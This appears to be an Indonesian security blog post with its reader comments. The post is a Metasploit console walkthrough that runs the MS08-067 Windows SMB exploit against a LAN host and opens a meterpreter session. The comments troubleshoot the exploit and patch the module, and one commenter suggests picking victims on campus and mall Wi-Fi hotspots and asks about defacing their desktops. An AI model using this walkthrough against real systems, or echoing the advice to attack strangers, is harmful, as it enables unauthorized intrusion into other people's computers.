MS08-067
msf > version
Framework: 3.2-testing.5773
Console : 3.2-testing.5773
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
msf exploit(ms08_067_netapi) > info windows/smb/ms08_067_netapi
Name: Microsoft Server Service Relative Path Stack Corruption
Version: 5803
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)
Provided by:
hdm
Available targets:
Id Name
-- ----
0 Windows XP SP2 English (DEP)
1 Windows XP SP3 English (DEP)
2 Windows 2003 SP0 English (NO DEP)
3 Windows 2003 SP2 English (NO DEP)
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload information:
Space: 400
Avoid: 7 characters
Description:
This module exploits a parsing flaw in the path canonicalization
code of NetAPI32.dll through the Server Service. This module is
capable of bypassing DEP on some operating systems and service
packs. The correct target must be used to prevent the Server Service
(along with a dozen others in the same process) from crashing.
Windows XP targets seem to handle multiple successful exploitation
events, but 2003 targets will often crash or hang on subsequent
attempts. This is just the first version of this module, full
support for DEP bypass on 2003, along with other platforms, is still
in development.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-4250
http://www.microsoft.com/technet/security/bulletin/MS08-067.mspx
msf exploit(ms08_067_netapi) > set RHOST 192.168.132.130
RHOST => 192.168.132.130
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > set TARGET 0
TARGET => 0
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Connecting to the target...
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.132.130[\BROWSER] ...
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.132.130[\BROWSER] ...
[*] Triggering the vulnerability...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73227 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.132.1:51707 -> 192.168.132.130:4444)
meterpreter > sysinfo
Computer: Research-1
OS : Windows XP (Build 2600, Service Pack 2).
Lagi-lagi netbios menjadi pintu masuk Microsoft Windows. Mungkin sudah saatnya pemberi tutorial melupakan RPC DCOM holes untuk contoh menembus Microsoft Windows via Metasploit.
I think everyone love 2008…
wah thanks nih omz, btw kok yg versi framework 3.2 yg buat win blm keluar ya
poniman_coy
31 Oct 08 at 12:43 pm
Metasploit 3.2 kan msh testing, utk mendapatkan versi itu bisa dengan cara update lngsng dari trunk nya via svn
staff
1 Nov 08 at 6:54 am
AFAIK, target 0 bukankah option windows 2000 ?, jika benar berarti kemungkinan ret addr-nya sama kah,(and kayaknya enggak deh) so wierd
, btw bisa exploit buatan EMM. anyway sepertinya development MSF makin tersendat neh 
.. hehe
gentoo
3 Nov 08 at 1:42 pm
#3 tergantung versi nya, klo update svn terbaru udah lbh banyak lagi data target nya dari berbagai locale hasil sumbangan komunitas MSF worldwide. Tulisan diatas menggunakan release yg awal2. RET ADDR ya beda lah. Hihi, iya ya sjk spoonm sama skape gak jd core developer kyknya bakal terjadi perubahan nih
msf > version
Framework: 3.2-testing.5773
Console : 3.2-testing.5773
msf exploit(ms08_067_netapi) > show targets
Exploit targets:
Id Name
— —-
0 Windows 2000 English
1 Windows XP SP0 English (NO NX)
2 Windows XP SP1 English (NO NX)
3 Windows XP SP2 English (NX)
4 Windows XP SP2 French (NX)
5 Windows XP SP2 Italian (NX)
6 Windows XP SP2 Portuguese (Brazil) (NX)
7 Windows XP SP2 German (NX)
8 Windows XP SP2 Chinese (NX)
9 Windows XP SP3 French (NX)
10 Windows XP SP3 English (NX)
11 Windows XP SP3 Spanish (NX)
12 Windows XP SP3 German (NX)
13 Windows XP SP3 Portuguese (Brazil) (NX)
14 Windows 2003 SP0 English (NO NX)
15 Windows 2003 SP1 English (NO NX)
16 Windows 2003 SP2 English (NO NX)
17 Windows 2003 SP1 English (NX)
18 Windows 2003 SP2 English (NX)
staff
3 Nov 08 at 3:53 pm
hahaha, iya, sori gak liat kalo dah lo list di artikel (hmm, kurang jeli aje), gw lama ga pake MSF, masih konvensional terpaku di single exploit (rilisnya lebih cepat, apalagi kalo dari irc
)
iya, ditambah lagi isu perubahan lisensi, lagian keknya emang ada isu politis soal di tunda-tundanya rilis exploit ini. Mikocok ketakutan sepertinya
gentoo
5 Nov 08 at 10:02 am
mas, sy sdh mengupdate metasploit hari kamis, 6 Nov 2008 (command = “svn update”), tapi kok g jalan ya…
errornya seperti ini
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP Service Pack 2 – lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[-] Exploit failed: can’t convert nil into Integer
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) >
padahal ketika saya update hari rabu, 5 nov 2008 exploit berjalan,,padahal dengan komputer yg sama (LAN sediri, kok).tu kenapa, ya mas?
ato saya bisa minta file “ms08_067_netapi.rb” punya mas itu?tolong kirimkan ke e-mail sy ya, mas…
terima kasih…
franky
6 Nov 08 at 4:19 pm
@poniman_coy
kalo mao pake versi yang 3.2-testing di WINDOWS harus update melalui svn update. Caranya “svn co http://metasploit.com/svn/framework3/trunk”
@franky
“Exploit failed: can’t convert nil into Integer”. Kata ownernya HD-Moore pas saya contact, dia bilang emang untuk SP tertentu terjadi seperti itu..but, hold on..coba deh liat scriptnya pake notepad.
find word: “Sratch” replace ke “Scratch”.itu untuk patch revisi 5846 gagal menurut ku. coba nantikan aja patch selanjutnya mungkin typonya sudah dibenarkan.
TO all: i new here, need learn much from you all. esspesially making exploit code.
Thank’s
-Corbinz-
CorbinZ
6 Nov 08 at 10:16 pm
# 6, seperti yang dikatakan oleh CorbinZ, terdapat typo atau salah tulis untuk setiap target dibagian Scratch address nya. Pada update tsb tertulis Sratch bukan Scratch, saya sudah coba update dengan trunk yang sama dengan kamu dan mendapatkan error yg sama, cukup ganti Sratch dengan Scratch.
$ sed s/Sratch/Scratch/g ms08_067_netapi.rb
# 7, Welcome… =)
staff
7 Nov 08 at 12:56 pm
Woh makin keren saja., anak-anak muda jaman sekarang..
**pakek metasploit aja ga pernah dan ga bisa
Ph03n1X
7 Nov 08 at 1:09 pm
** Duh, gak pernah bisa pakek Metasploit… Nasib deh **
scut
8 Nov 08 at 10:20 am
@corbinZ and @staff
exploitnya sdh berjalan kembali, thanks bgt mas….
@ph03n1x and @scut
dicoba aja terus, jgn menyerah n klo da error kan bisa di diskusikan disini….
franky
8 Nov 08 at 2:41 pm
#10
makane mbut, tidak nunggu kiriman! Cari sendiri =))
#11
Siaaapppppppppppp juragan
Ph03n1X
9 Nov 08 at 3:15 am
saya dah install BT3F, trus dah update msf3 nya. kira2 proses lanjutan yg pake “PAYLOAD windows/meterpreter/bind_tcp” gimana ya? maaf pengen tau aj. gak ada lahan buat uji coba. terima kasih yg dah mau jawab.
QU1NT1N
10 Nov 08 at 4:15 am
@QU1NT1N
ketik ja “help”, ntar da pilihan fitur2 pa ja yg da pada meterpreter….
Selamat mencoba..
franky
10 Nov 08 at 7:48 am
@CorbinZ thanks broo berjalan dianya,
poniman_coy
10 Nov 08 at 1:38 pm
gitu ya mas franky? ya udah, tak pinjem cd bajakan dulu…
QU1NT1N
10 Nov 08 at 5:30 pm
wah kenapa ya mas, pas saya jalankan svn co http://metasploit.com/svn/framework3/trunk ya dia jalan, trus udh selesai ada tulisan cek revision 5846, nah kan sarannya mas diatas buat replace kata Sratch dengan Scratch. pas aku cek kata sratch udah gk ada lg yang ada Scratch, jadi kan udah bener, nah jadi pas saya use windows/smb/ms08_067_netapi kok failed apa masih ada yang salah ya ? apa karena saya pake metas yg 3.0 apa mesti pake yang 3.1 ?
poniman_coy
10 Nov 08 at 6:45 pm
http://www.kecoak-elektronik.net/log/2008/10/31/ms08-067/
check this out…
dsh3ll.d
11 Nov 08 at 11:58 am
http://video.google.com/videoplay?docid=-5555664098592837592
dsh3ll.d
11 Nov 08 at 12:00 pm
#12 Aku tanggal 15 November ke Bandung, kalau kau mau ikut coba confirmasi ke Opik.
scut
11 Nov 08 at 1:12 pm
@poniman_coy
YUP…pake yang 3.1 aja kan lebih up to date…
CorbinZ
11 Nov 08 at 10:53 pm
#20, titip liat awewe-awewe di bandung nyak, dah lama gak jenguk =))
staff
11 Nov 08 at 11:22 pm
@CorbinZ saya coba omz…
@http://video.google.com/videoplay?docid=-5555664098592837592 , bisa buta liat tu video…pecah gambarnya..
poniman_coy
12 Nov 08 at 1:00 am
minta ijin download videonya.
QU1NT1N
12 Nov 08 at 4:54 am
Saya menggunakan Metasploit versi 3.1 untuk Windows. Sudah diupdate menggunakan file Online Update, tapi belum ad juga tuh exploit untuk MS08-067… saya sudah punya ms08_067_netapi.rb , lalu bagaimana untuk mengintegrasikanny ke dalam Framework Metasploitnya???
Trim’s
asmssl
17 Nov 08 at 4:53 am
Mas, gimana setting di svn kalo pake http proxy, aku coba kok gagal melulu
zodiac
18 Nov 08 at 2:47 pm
ko udah a “svn co http://metasploit.com/svn/framework3/trunk” masih
msf > version
Framework: 3.1-release.5366
Console : 3.1-release.5404
udah aku “svn update” keluarnya
Skipped ‘.’
mohon solusinya dong
f4r1z
19 Nov 08 at 9:08 am
wah masih bingung hehehehe.. bener” ngga ada tempat buat explorasinya sih..
b4tn3t
1 Dec 08 at 10:33 am
@f4riz
km download aja yg versi 3.2, kan sudah release…
@b4tn3t
soal target, kan bisa cari di kampus2 n mall2 yg nyediakan hotspot…
ada yg tau atau punya video untuk deface tampilan desktop nya??
thanks semua…
franky
5 Dec 08 at 8:26 am
@franky
iy ni, udah download ko and sudah berhasil, terima kasih semua buat anak2 kecoak, nambah ilmu ni
f4r1z
10 Dec 08 at 10:37 pm
Keren tuh, tinggal bagaimana cara mempertahankannya. Ada yang tahu? Jangan sampe habis menyerang, kita malah diserang kalah total
)
Btw, ada yang tahu cara install modul/exploit tambahan di metasploit nggak ?
iroel
20 Dec 08 at 10:56 pm
^– di jalanin aja Start -> Programs -> Metasploit 3 -> Online Update,,
nanti dia download sendiri koq ^_^
Wah,, mantab2, bisa lho dipake ke XP SP2,
btw, gimana caranya supaya kita bisa ngebuka port 445 di komp target supaya bisa masukin exploit ini?ada yang tahu?plz . . .
asik2
30 Dec 08 at 8:51 pm
#31
Mempertahankan? update aja windoznya :p
#32
Ngebuka port? uninstall updatenya :p
CyberTank
8 Jan 09 at 6:03 pm
cara puka port mah susah kali ya, mendingan scan port 445. Tp yo suwi yooo…
youthanesia
1 Feb 09 at 12:42 am
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP Service Pack 2 – lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability…
[*] Exploit completed, but no session was created.
# koq ga bisa yahhhh ?? ada ide temn2 ?
az
15 May 09 at 10:23 pm
iya nih problem sama kaya #35
…..
[*] Triggering the vulnerability…
[*] Exploit completed, but no session was created.
knapa tuh om?
grind
11 Jun 09 at 6:31 am
Sama tuh … ga pernah berhasil.
Slalu GAGAL truz…fyuuuuhhhh
NewBie
18 Jul 09 at 9:05 am
siang yang panas :
sa coba ngikut ini tapi ko selalu muncul :
>> exploit
[*] Started bind handler
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP Service Pack 2 – lang:English [*] Selected Target: Windows XP SP2 English (NX) [*] Triggering the vulnerability…
[*] Exploit completed, but no session was created.
tq : infonya
cemens
30 Jul 09 at 12:21 pm
Metasploit 3.2 yg versi portable bisa didownload di http://www.indowebster.com/Metasploit_Framework_32_Portable.html Silakan gunakan dengan bijak.
Aq nyoba sama seperti tutorial. Session DOS promptnya tidak muncul. Klo pake payload windows/shell_bind_tcp, sessionnya langsung close klo pengen buka DOS promptnya target. Ada yg tau penyebabnya? Ini outputnya:
[*] Started bind handler
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP Service Pack 3 – lang:English [*] Selected Target: Windows XP SP3 English (NX) [*] Triggering the vulnerability…
[*] Command shell session 2 opened (192.168.0.6:1661 -> 192.168.0.1:4545) [*] Command shell session 2 closed.
iroel
6 Oct 09 at 4:40 pm
lol
happy playing
playing for happy
wtf
rooted.slash
24 Oct 09 at 12:28 am